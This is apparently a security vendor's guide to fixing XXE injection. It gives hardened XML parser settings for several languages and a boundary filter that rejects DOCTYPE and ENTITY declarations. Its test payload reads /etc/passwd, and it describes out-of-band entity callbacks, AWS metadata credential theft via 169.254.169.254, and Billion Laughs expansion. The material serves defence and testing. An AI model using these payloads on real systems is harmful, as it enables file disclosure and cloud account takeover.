AuditCoreAuditCore
highCWE-611OWASP A05:2021XML External Entity Injection

How to fix XXE injection

XXE (XML External Entity) injection happens when an XML parser processes external entities embedded in user-supplied XML. Attackers use it to read server files, perform SSRF, exfiltrate data via DNS, and crash services. The fix is one line per parser — but the line is different for every parser, and most languages default to DANGEROUS settings.

What is XXE?

XML supports a feature called external entities — placeholders that reference external resources during parsing. The original use case was reusable content (citation databases, glossary terms). The exploitable case: an attacker submits XML with an entity that points to file:///etc/passwd or http://internal-service. When the parser resolves the entity, it reads the file or makes the HTTP request — and includes the result in the parsed XML. The attacker gets the response back.

XXE has been known since 2002 but persists because most XML parser libraries ship with external entity processing ENABLED by default. Java's JAXP, .NET's XmlReader, PHP's DOM/SimpleXML, libxml2 (the engine behind Python lxml and Ruby Nokogiri) — all default to dangerous settings. To use XML safely, you have to explicitly disable external entities.

The vulnerability surface is wider than 'an XML endpoint'. SVG files (which are XML), DOCX/XLSX/PPTX (zipped XML), SOAP services, RSS/Atom feeds, SAML responses, OAuth flows that accept SAML, image upload endpoints, e-signature workflows, document conversion services — all process XML somewhere in the pipeline. Many breaches happen at unexpected XML touchpoints (attacker uploads malicious .docx → the document conversion library hits XXE → server filesystem leaks).

Beyond file read, XXE escalates to SSRF (entities pointing to internal HTTP services, including AWS metadata 169.254.169.254), out-of-band data exfiltration via DNS or HTTP callbacks, and Billion Laughs / exponential entity expansion DoS attacks. A single XXE vulnerability can be the entry point to full cloud compromise — read EC2 metadata, get the IAM role's temporary credentials, escalate from there.

What an attacker can do

The concrete impact of leaving XXE unpatched.

Server filesystem read (file:// protocol)

Read /etc/passwd, /etc/shadow (if running as root), AWS credentials in ~/.aws/credentials, Kubernetes serviceaccount tokens, app .env files, source code.

SSRF to internal services

Entities pointing to http://localhost or internal IPs hit services not exposed publicly. Pivot to admin panels, internal APIs, databases.

Cloud metadata service compromise

On AWS, read 169.254.169.254/latest/meta-data/iam/security-credentials/<role> to get IAM role credentials. Single XXE = full AWS account access.

Out-of-band data exfiltration

Even when responses are blind (no XML output returned), entities can trigger DNS lookups or HTTP requests to attacker-controlled servers, leaking data via the URL.

DoS via entity expansion (Billion Laughs)

Recursive entity definitions cause exponential memory growth — 1KB of XML balloons into multiple GB during parsing. Crashes service workers, OOM kills.

Pivot to RCE in misconfigured stacks

Java with deserialization in classpath, PHP with phar:// protocol, .NET with object factory entities — XXE escalates to remote code execution in specific configurations.

How do I know if I'm vulnerable?

Manual: any endpoint that accepts XML, SOAP, SAML, RSS, SVG upload, DOCX/XLSX upload, or document conversion is a candidate. Send a payload with <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>. If the response contains the contents of /etc/passwd or you see hints (root:x:0:0:root in the parsed output, an error mentioning the file), you have XXE. Also try out-of-band — an entity pointing to http://your-burp-collaborator-url and watch for incoming requests.

Automated: AuditCore's XXE scanner runs on Pro and Business tiers. We send 8 payload variants: file://, http://internal, http://169.254.169.254 (AWS metadata), DTD-based out-of-band, parameter entities, billion laughs, gopher://, and PHP filter wrappers. We catch both inline (response includes leaked data) and blind XXE (DNS callback to our infrastructure). Free Trial covers basic XML endpoints on the homepage.

Code review pattern: search your codebase for XML parser instantiations. In Python: lxml.etree.parse, ElementTree.parse, xml.dom.minidom.parseString. In Java: DocumentBuilderFactory.newInstance, SAXParserFactory.newInstance, XMLReaderFactory.createXMLReader. In Node: xml2js, fast-xml-parser, libxmljs. In PHP: simplexml_load_string, DOMDocument::loadXML. Each instantiation needs explicit configuration to disable external entities — Step 1 below shows the patterns per parser.

How to fix XXE

6 ordered steps. Apply them in order — each builds on the previous.

  1. 1

    Disable external entity resolution at the parser level

    The single most effective fix. Configure your XML parser to refuse external entities — every parser supports this, but each uses different syntax.

    This is the canonical fix. Disable external entities (DTD, parameter entities, external general entities) at parser construction. Also disable network access if your parser exposes that toggle. The exact API varies per language — see code examples for the 6 most common parsers below.

    Python / lxmlStep 1
    from lxml import etree
    
    # VULNERABLE — defaults
    parser = etree.XMLParser()  # external entities ENABLED
    
    # SECURE
    parser = etree.XMLParser(
        resolve_entities=False,  # disable entity resolution
        no_network=True,         # block all network access
        dtd_validation=False,    # disable DTD validation
        load_dtd=False,          # don't fetch DTD
        huge_tree=False,         # cap tree size — billion laughs defense
    )
    tree = etree.parse(xml_file, parser)
  2. 2

    Same fix in Java JAXP / DocumentBuilderFactory

    Java is the most XXE-vulnerable language by default. JAXP, SAX, DOM, StAX all need explicit hardening — at every parser instantiation in your codebase.

    Java's XML stack (JAXP) ships with external entities ON by default and the OWASP-recommended settings list is long. Use a centralized helper that applies all hardenings at once and use that helper EVERYWHERE you parse XML. Audit every DocumentBuilderFactory.newInstance() in your codebase.

    JavaStep 2
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    
    // Disable DTDs entirely (best defense)
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // Belt and suspenders if DTDs can't be disabled:
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
    
    DocumentBuilder builder = dbf.newDocumentBuilder();
    Document doc = builder.parse(xmlInput);
  3. 3

    Same fix in .NET XmlReader / XmlDocument

    .NET defaults shipped XXE-vulnerable until .NET 4.5.2+, and lots of legacy code is still on older targets. Set DtdProcessing.Prohibit and an XmlResolver.

    Modern .NET (4.5.2+) defaults to safe behavior, but legacy apps or code paths instantiating XmlReader/XmlDocument with custom settings often regress. Set DtdProcessing = DtdProcessing.Prohibit and an explicit null XmlResolver to block external resolution.

    C# / .NETStep 3
    // XmlReader (preferred — explicit and modern)
    var settings = new XmlReaderSettings {
        DtdProcessing = DtdProcessing.Prohibit, // block DTDs entirely
        XmlResolver = null,                     // refuse external resolution
    };
    using (var reader = XmlReader.Create(stream, settings)) {
        // safe parsing
    }
    
    // XmlDocument (legacy — also safe with these settings)
    var doc = new XmlDocument {
        XmlResolver = null,
    };
    doc.Load(xmlInput);
  4. 4

    Disable XXE in PHP libxml-based parsers

    PHP's DOMDocument, SimpleXML, XMLReader all use libxml2. Older PHP defaults to external-entity-on; PHP 8+ flipped to safer defaults but legacy code still calls libxml_disable_entity_loader without realizing it's deprecated.

    On PHP 8+, libxml defaults are XXE-safe. On older PHP, you NEED libxml_disable_entity_loader(true) before parsing. PHP 8 deprecated that function (because the default is now safe), but if you support older PHP you still need both. The LIBXML_NOENT flag specifically ENABLES entities — never use it.

    PHPStep 4
    <?php
    // PHP 8.0+: libxml is safe by default. PHP < 8.0: explicit fix required.
    if (PHP_MAJOR_VERSION < 8) {
        libxml_disable_entity_loader(true);
    }
    
    $doc = new DOMDocument();
    // LIBXML_NOENT ENABLES entity resolution — NEVER use it
    $doc->loadXML($xmlInput, LIBXML_DTDLOAD | LIBXML_DTDATTR);
    
    // Better: use the safer parse-only flags
    $doc->loadXML($xmlInput); // no flags = uses safe defaults
  5. 5

    Disable XXE in Node.js XML libraries

    Node lacks a built-in XML parser, so projects pull in xml2js, fast-xml-parser, libxmljs, sax. Each has its own XXE story — most are safe by default but check.

    xml2js: doesn't process external entities by default — safe. fast-xml-parser: safe by default; the processEntities option must be off (which it is). libxmljs (which wraps libxml2): inherits libxml2's UNSAFE defaults — must pass noent: false, noNet: true. sax-js: doesn't process external entities — safe. The takeaway: stick to xml2js or fast-xml-parser; if you need libxmljs, harden it.

    Node.js / libxmljsStep 5
    const libxmljs = require('libxmljs');
    
    // VULNERABLE — defaults inherited from libxml2
    const doc = libxmljs.parseXml(xmlInput);
    
    // SECURE
    const doc = libxmljs.parseXml(xmlInput, {
      noent: false,    // do NOT replace entities
      noNet: true,     // disable network access for entity resolution
      dtdload: false,  // do NOT fetch DTDs
      dtdvalid: false, // do NOT validate against DTD
      doctype: false,  // disallow DOCTYPE declarations entirely
    });
  6. 6

    Block XXE at upload boundary — reject XML containing DOCTYPE

    Defense in depth. If your endpoint receives uploaded XML/SVG/DOCX, scan for <!DOCTYPE before parsing. Reject anything containing it.

    Most legitimate XML in 2026 doesn't contain DOCTYPE declarations — only attackers add them to inject entities. Scanning the raw byte stream for <!DOCTYPE BEFORE parsing catches XXE attempts at the boundary, even if a parser somewhere downstream is misconfigured. This is belt-and-suspenders defense — pair with step 1 always.

    TypeScriptStep 6
    function rejectIfXxeAttempt(xml: string): void {
      // Strip BOM and whitespace before checking
      const trimmed = xml.replace(/^\uFEFF?\s*/, '');
    
      if (/<!DOCTYPE/i.test(trimmed)) {
        throw new Error('XML containing DOCTYPE declarations is not accepted');
      }
      if (/<!ENTITY/i.test(trimmed)) {
        throw new Error('XML containing ENTITY declarations is not accepted');
      }
    }
    
    // In your handler
    app.post('/api/import/xml', async (req, res) => {
      rejectIfXxeAttempt(req.body); // boundary check
      const parsed = safeParser.parseString(req.body); // hardened parser too
      res.json(parsed);
    });

How to verify the fix

Manual: send a request to your XML endpoint containing the canonical OOB-XXE payload pointing to a webhook you control (e.g. webhook.site). If you see ANY incoming request to that webhook after submission, your parser is fetching external entities — XXE confirmed. Repeat with file:// payload pointing to /etc/passwd; if the response contains 'root:x:0:0:' you have file-read XXE.

Automated: AuditCore's XXE scanner (Pro/Business) runs 8 payload variants and confirms findings via inline output OR out-of-band callbacks to our infrastructure. Findings include the exact payload, the parser-leak detected, and language-specific fix prompts.

Long-term: add a unit test for every XML-accepting endpoint that submits a DOCTYPE-containing payload and asserts a 400 response (blocked at boundary) or empty parsing result (parser ignored entities). Run on every PR. Pair with quarterly re-audits to catch the case where someone bumps a parser library and the new version flipped a default.

FAQ

Frequently asked questions

Why does XXE still happen in 2026?+

Three reasons. (1) Most XML parsers ship with UNSAFE defaults — Java JAXP, libxml2 (Python lxml, Ruby Nokogiri), older .NET, older PHP. (2) Developers don't realize they're parsing XML — DOCX/XLSX uploads, SAML responses, document conversion services all contain XML somewhere. (3) Code review misses it because the fix is at the parser instantiation, not in the obvious 'XML handling' code.

Is JSON safe from XXE?+

JSON itself has no concept of external entities, so plain JSON is XXE-immune. But many APIs accept BOTH JSON and XML on the same endpoint (Content-Type negotiation). If yours does, the XML path needs the same hardening. Also: some 'JSON' formats embed XML (like SOAP-over-JSON or XML-in-stringfield), and that XML still hits an XML parser.

What about SVG uploads — are those XXE-vulnerable?+

SVG is XML, so yes. Image processing libraries (ImageMagick, librsvg, sharp) sometimes invoke an XML parser to read SVG metadata. ImageMagick had a famous XXE chain via SVG (CVE-2016-3714, 'ImageTragick'). If you accept SVG uploads, sanitize them with a DOMPurify-style allowlist or convert to PNG before storing.

Does WAF block XXE attacks?+

WAFs catch the obvious payloads (SYSTEM "file://...") but bypass-able with parameter entities, DTD remote inclusion, encoded payloads. Treat WAF as defense in depth, not the fix. The fix is parser configuration.

What's the difference between in-band and out-of-band XXE?+

In-band XXE: the parser includes the leaked data in the response, attacker reads it directly. Out-of-band (OOB): no direct response, but the parser triggers a DNS lookup or HTTP request to attacker-controlled infrastructure, leaking data via the URL or hostname. OOB XXE works against blind endpoints (e.g. document conversion services where you only get a success/failure response).

How does XXE pivot to SSRF and cloud metadata?+

External entities can use http:// (or https://) URLs. Point the entity to http://169.254.169.254/latest/meta-data/iam/security-credentials/<role> on EC2 — the parser fetches that URL, including AWS IAM role credentials in the entity replacement. Attacker reads credentials from the parsed XML. Single XXE = full cloud account compromise on misconfigured EC2 / GKE / AKS.

Is the Billion Laughs attack still real?+

Yes, on parsers without entity-expansion limits. The classic payload defines &lol; = lolol, &lol2; = &lol;&lol;&lol;, recursing 10 times — final XML is 1KB but expands to ~10 billion characters in memory, OOM-killing the worker. Modern parsers (recent libxml2, JAXP secure-processing) cap entity expansion. Always disable DTDs entirely if you don't need them — Step 2 above shows the exact JAXP feature flag.

Should I use a JSON-only API to avoid XXE entirely?+

If your domain doesn't require XML, yes — use JSON exclusively and never expose XML parsing. If you need XML interoperability (SOAP integrations, SAML, legacy partner APIs), you can't avoid XML — but you can quarantine it: a single hardened parser module that handles all XML, with everything else operating on already-parsed data. Reduces the audit surface dramatically.

Don't just guess — scan and verify

AuditCore Free Trial scans your homepage for XXE and 50+ other vulnerability classes. No credit card. Results in 60 seconds.